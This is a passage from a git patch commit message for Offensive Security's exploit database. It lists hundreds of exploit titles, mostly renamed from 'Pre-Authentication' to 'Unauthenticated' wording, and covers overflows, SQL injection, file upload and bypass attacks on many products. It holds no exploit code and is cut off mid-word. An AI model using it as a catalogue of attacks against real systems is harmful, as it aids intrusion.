From 0be1ea959a2d078221d43cba80a942cb6a5d4966 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 9 Sep 2016 05:09:09 +0000 Subject: [PATCH] DB: 2016-09-09 11 new exploits Samba 3.0.4 - SWAT Authorization Buffer Overflow Samba 3.0.4 SWAT - Authorisation Buffer Overflow Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2) HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit) HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit) WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC) WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC) FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service Multiple Applications - Local Credentials Disclosure Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2) Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2) IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC) Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC) Hexamail Server 3.0.0.001 - (pop3) Unauthenticated 
Remote Overflow (PoC) Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC) Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC) Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC) SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC) MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow Joomla Component JPad 1.0 - Post-Authentication SQL Injection Joomla Component JPad 1.0 - Authenticated SQL Injection CMS Made Simple 1.2.4 - (FileManager module) File Upload CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication) freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated) freeSSHd 1.2.1 - (Post-Authentication) Remote SEH Overflow freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow vsftpd 2.0.5 - (CWD) Post-Authentication Remote Memory Consumption Exploit vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit Surgemail 39e-1 - Post-Authentication IMAP Remote Buffer Overflow Denial of Service Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service Debian OpenSSH - 
(Post-Authentication) Remote SELinux Privilege Elevation Exploit Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit Oracle Internet Directory 10.1.4 - Remote Pre-Authentication Denial of Service Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service AvailScript Jobs Portal Script - (Post-Authentication) (jid) SQL Injection AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection AvailScript Jobs Portal Script - (Post-Authentication) File Upload AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload Serv-U 7.3 - (Post-Authentication) (stou con:1) Denial of Service Serv-U 7.3 - (Post-Authentication) Remote FTP File Replacement Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service Serv-U 7.3 - (Authenticated) Remote FTP File Replacement Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack (PoC) Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload Attack (PoC) Noticeware E-mail Server 5.1.2.2 - (POP3) Pre-Authentication Denial of Service Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service freeSSHd 1.2.1 - (Post-Authentication) SFTP rename Remote Buffer Overflow PoC freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC LoudBlog 0.8.0a - (Post-Authentication) (ajax.php) SQL Injection LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection freeSSHd 1.2.1 - (Post-Authentication) SFTP realpath Remote Buffer Overflow PoC freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC AJ Auction Authentication - Bypass Exploit AJ Auction - Authentication Bypass Simple Directory Listing 2 - Cross-Site File Upload Simple Directory Listing 2 - Cross-Site Arbitrary File Upload Mini File Host 1.x - Arbitrary PHP File Upload Mini File Host 1.x - Arbitrary .PHP File Upload Memberkit 1.0 - Remote PHP File Upload Memberkit 1.0 - Remote Arbitrary .PHP File Upload WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow 
WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC) Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC) WikkiTikkiTavi 1.11 - Remote PHP File Upload WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation zFeeder 1.6 - 'admin.php' Pre-Authentication zFeeder 1.6 - 'admin.php' Unauthenticated Addonics NAS Adapter - Post-Authentication Denial of Service Addonics NAS Adapter - Authenticated Denial of Service Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service Hannon Hill Cascade Server - (Post-Authentication) Command Execution Hannon Hill Cascade Server - (Authenticated) Command Execution Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC) XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC) Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure MySQL 
5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal Adobe JRun 4 - (logfile) Authenticated Directory Traversal FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service NetAccess IP3 - (Post-Authentication) (ping option) Command Injection NetAccess IP3 - (Authenticated) (ping option) Command Injection Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC) httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (SEH) (PoC) Easy~Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow (PoC) Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC) Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC) httpdx 1.5.3b - Multiple Remote Pre-Authentication Denial of Service (PoC) httpdx 1.5.3b - Multiple Remote 
Unauthenticated Denial of Service (PoC) Kerio MailServer 6.2.2 - Pre-Authentication Remote Denial of Service (PoC) Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit) eDisplay Personal FTP server 1.0.0 - Pre-Authentication Denial of Service (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC) eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1) eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2) eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2) uTorrent WebUI 0.370 - Authorization header Denial of Service uTorrent WebUI 0.370 - Authorisation Header Denial of Service Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass) ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass) Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass) BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass) dotDefender 3.8-5 - 
Pre-Authentication Remote Code Execution (via Cross-Site Scripting) dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting) Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit) Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit) UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow Achievo 1.4.3 - Multiple Authorization Flaws Achievo 1.4.3 - Multiple Authorisation Flaws PHPMotion 1.62 - 'FCKeditor' File Upload PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal Home FTP Server 1.11.1.149 - Authenticated Directory Traversal News Script PHP Pro - 'FCKeditor' File Upload News Script PHP Pro - 'FCKeditor' Arbitrary File Upload Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion Vtiger 
CRM 5.0.4 - Unauthenticated Local File Inclusion HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow MailEnable - Authorization Header Buffer Overflow MailEnable - Authorisation Header Buffer Overflow ColdFusion 8.0.1 - Arbitrary File Upload and Execution Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution ColdFusion 8.0.1 - Arbitrary File Upload / Execution Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution OpenX - banner-edit.php File Upload PHP Code Execution OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution Joomla 1.5.12 - tinybrowser File Upload Code Execution Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit If-CMS 2.07 - Pre-Authentication Local File Inclusion (1) If-CMS 2.07 - Unauthenticated Local File Inclusion (1) IPComp - encapsulation Pre-Authentication kernel memory Corruption IPComp - encapsulation Unauthenticated kernel memory Corruption SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass) Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass) Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow ActFax Server FTP - (Authenticated) Remote Buffer Overflow If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2) If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass) DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP 
Bypass) DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit DVD X Player 5.5 Pro - (SEH + ASLR + DEP Bypass) Exploit TomatoCart 1.1 - Post-Authentication Local File Inclusion TomatoCart 1.1 - Authenticated Local File Inclusion BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass QuiXplorer 2.3 - Bugtraq File Upload QuiXplorer 2.3 - Bugtraq Arbitrary File Upload QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit) QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit) Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter) Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter) BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection Dolibarr ERP & CRM 3 - Authenticated OS Command Injection V-CMS - PHP File Upload and Execution V-CMS - Arbitrary .PHP File Upload / Execution WebCalendar 1.2.4 - Pre-Authentication Remote Code Injection WebCalendar 1.2.4 - Unauthenticated Remote Code Injection appRain CMF - Arbitrary PHP File Upload appRain CMF - Arbitrary .PHP File Upload EGallery - PHP File Upload EGallery - Arbitrary .PHP File Upload SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Post-Authentication SQL Injection SpiceWorks 5.3.75941 - Persistent Cross-Site Scripting / Authenticated SQL Injection WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary 
.PHP File Upload WebPageTest - Arbitrary PHP File Upload WebPageTest - Arbitrary .PHP File Upload XODA 0.4.5 - Arbitrary PHP File Upload XODA 0.4.5 - Arbitrary .PHP File Upload Elcom CMS 7.4.10 - Community Manager Insecure File Upload Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection Trend Micro Control Manager 5.5/6.0 AdHocQuery - Authenticated Blind SQL Injection Mod_SSL 2.8.x - Off-by-One HTAccess Buffer Overflow Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow Dropbox Desktop Client 9.4.49 (64bit) - Local Credentials Disclosure OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1) OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2) Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1) Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit qdPM 7.0 - Arbitrary PHP File Upload qdPM 7.0 - Arbitrary .PHP File Upload Oracle Database - Authentication Protocol Security Bypass Oracle Database - Protocol Authentication Bypass Mod_NTLM 0.x - Authorization Heap Overflow Mod_NTLM 0.x - Authorisation Heap Overflow Mod_NTLM 0.x - Authorization Format String Mod_NTLM 0.x - Authorisation Format String Geeklog 1.3.x - Authentication SQL Injection Geeklog 1.3.x - Authenticated SQL Injection NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution MySQL - Remote Pre-Authentication User Enumeration MySQL - Remote Unauthenticated User Enumeration vbPortal 2.0 alpha 8.1 - Authentication SQL Injection vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (1) DameWare Mini Remote 
Control Server 3.7x - Pre-Authentication Buffer Overflow (2) DameWare Mini Remote Control Server 3.7x - Pre-Authentication Buffer Overflow (3) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (1) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (2) DameWare Mini Remote Control Server 3.7x - Unauthenticated Buffer Overflow (3) WordPress WP-Property Plugin - PHP File Upload WordPress Asset-Manager Plugin - PHP File Upload WordPress WP-Property Plugin - Arbitrary .PHP File Upload WordPress Asset-Manager Plugin - Arbitrary .PHP File Upload Ubiquiti AirOS 5.5.2 - Remote Post-Authentication Root Command Execution Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution RobotFTP Server 1.0/2.0 - Remote Pre-Authentication Command Denial of Service RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (1) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorization Request Denial of Service (2) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (1) SureCom EP-9510AX/EP-4504AX Network Device - Malformed Web Authorisation Request Denial of Service (2) Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun Novell NCP - Pre-Authentication Remote Root Exploit Novell NCP - Unauthenticated Remote Root Exploit Polar Helpdesk 3.0 - Cookie Based Authentication System Bypass Polar Helpdesk 3.0 - Cookie Based Authentication Bypass IRIS Citations Management Tool - (Post-Authentication) Remote Command Execution IRIS Citations Management Tool - (Authenticated) Remote Command Execution Polycom HDX - 
Telnet Authorization Bypass (Metasploit) Polycom HDX - Telnet Authentication Bypass (Metasploit) OpenEMR - PHP File Upload OpenEMR - Arbitrary .PHP File Upload PolarPearCMS - PHP File Upload PolarPearCMS - Arbitrary .PHP File Upload Apache 2.0.x - mod_ssl Remote Denial of Service Apache/mod_ssl 2.0.x - Remote Denial of Service phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload phpWebSite 0.x - Image File Processing Arbitrary .PHP File Upload BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload BlueSoleil 1.4 - Object Push Service BlueTooth File Upload Directory Traversal BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal MoinMoin - twikidraw Action Traversal File Upload MoinMoin - twikidraw Action Traversal Arbitrary File Upload Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption Alt-N MDaemon 2-8 - Remote Pre-Authentication IMAP Buffer Overflow Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow FlexWATCH 3.0 - AIndex.asp Authorization Bypass FlexWATCH 3.0 - AIndex.asp Authentication Bypass HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload HP ProCurve Manager SNAC - UpdateCertificatesServlet File Upload HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload WordPress Curvo Themes - Cross-Site Request Forgery File Upload WordPress Curvo Themes - Cross-Site Request Forgery / Arbitrary File Upload WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload WordPress Highlight Premium Theme - Cross-Site Request Forgery / Arbitrary File Upload PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass PHPBB2 - Admin_Ug_Auth.php Administrative Bypass Adobe Acrobat Reader - ASLR + DEP 
Bypass with SANDBOX Bypass Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass Castripper 2.50.70 - '.pls' DEP Exploit Castripper 2.50.70 - '.pls' DEP Bypass Exploit Google Urchin 5.7.3 - Report.cgi Authorization Bypass Google Urchin 5.7.3 - Report.cgi Authentication Bypass Adobe Flash - Method Calls Use-After-Free Adobe Flash - Transform.colorTranform Getter Info Leak RSA Authentication Agent for Web 5.3 - URI redirection RSA Authentication Agent for Web 5.3 - URI Redirection Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow Zabbix 2.0 - 3.0.3 - SQL Injection ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload / Arbitrary Code Execution Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure LogMeIn Client 1.3.2462 (64bit) - Local Credentials Disclosure SpagoBI 4.0 - Arbitrary Cross-Site Scripting / File Upload SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload Katello (Red Hat Satellite) - users/update_roles Missing Authorization Katello (Red Hat Satellite) - users/update_roles Missing Authorisation Freepbx 13.0.x < 13.0.154 - Remote Command Execution FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution Jobberbase 2.0 - Multiple Vulnerabilities Windows x86 - Bind Shell TCP Shellcode WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated File Upload WordPress MailPoet Newsletters 2.6.8 Plugin - (wysija-newsletters) Unauthenticated Arbitrary File Upload Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution Moab < 7.2.9 - Authorization 
Bypass Moab < 7.2.9 - Authentication Bypass Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection Tapatalk for vBulletin 4.x - Unauthenticated Blind SQL Injection Drupal Core < 7.32 - Pre-Authentication SQL Injection Drupal Core < 7.32 - Unauthenticated SQL Injection Tincd - Post-Authentication Remote TCP Stack Buffer Overflow Tincd - Authenticated Remote TCP Stack Buffer Overflow PMB 4.1.3 - Post-Authentication SQL Injection PMB 4.1.3 - Authenticated SQL Injection Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authentication Remote Code Execution Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution ManageEngine Multiple Products - Authenticated File Upload ManageEngine Multiple Products - Authenticated Arbitrary File Upload Chyrp 2.x - swfupload Extension upload_handler.php File Upload Arbitrary PHP Code Execution X360 VideoPlayer ActiveX Control 2.6 - (Full ASLR + DEP Bypass) Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass) Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection Symantec Web Gateway 5 - restore.php Authenticated Command Injection JBoss Seam 2 - Arbitrary File Upload and Execution JBoss Seam 2 - Arbitrary File Upload / Execution Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit) Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution WordPress RevSlider 3.0.95 Plugin - 
Arbitrary File Upload / Execution JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass JibberBook 2.3 - 'Login_form.php' Authentication Bypass Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution Zenoss 3.2.1 - Remote Post-Authentication Command Execution Zenoss 3.2.1 - Remote Authenticated Command Execution Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution Magento CE < 1.9.0.1 - Authenticated Remote Code Execution Netsweeper 4.0.9 - Arbitrary File Upload and Execution Netsweeper 4.0.9 - Arbitrary File Upload / Execution Netsweeper 4.0.8 - Arbitrary File Upload and Execution Netsweeper 4.0.8 - Arbitrary File Upload / Execution EasyITSP - 'customers_edit.php' Authentication Security Bypass EasyITSP - 'customers_edit.php' Authentication Bypass Wolf CMS - Arbitrary File Upload and Execution Wolf CMS - Arbitrary File Upload / Execution Konica 